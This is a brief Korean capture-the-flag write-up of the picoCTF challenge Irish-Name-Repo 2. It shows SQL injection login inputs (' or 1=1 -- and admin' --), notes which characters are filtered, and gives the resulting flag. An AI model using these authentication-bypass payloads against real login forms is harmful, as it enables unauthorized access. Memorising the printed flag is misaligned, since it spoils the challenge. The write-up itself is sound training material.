문제
풀이
Irish-Name-Repo 1과 구성 동일
첫 번째 시도
Username : ' or 1=1 --
Password : 12
-> 무언가 필터링이 되고 있음
Username에 ', or, =, -- 를 입력하면 로그인이 실패했다는 문구가 뜸
-> 이를 필터링하지 않음
Username에 ' or 를 입력하니 SQL 문구가 뜸
-> ' or 를 필터링함
두 번째 시도
Username : admin' --
Password : 12
picoCTF{m0R3_SQL_plz_aee925db}
'Wargame & CTF > picoCTF' 카테고리의 다른 글
| [picoCTF][Reverse Engineering]asm2 문제 풀이 (1) | 2021.01.07 |
|---|---|
| [picoCTF][Web Exploitation]Irish-Name-Repo 1 문제 풀이 (0) | 2021.01.05 |
| [picoCTF][Reverse Engineering]vault-door-5 문제 풀이 (1) | 2021.01.04 |
| [picoCTF][Web Exploitation]where are the robots 문제 풀이 (0) | 2021.01.03 |
| [picoCTF][Web Exploitation]dont-use-client-side 문제 풀이 (0) | 2021.01.02 |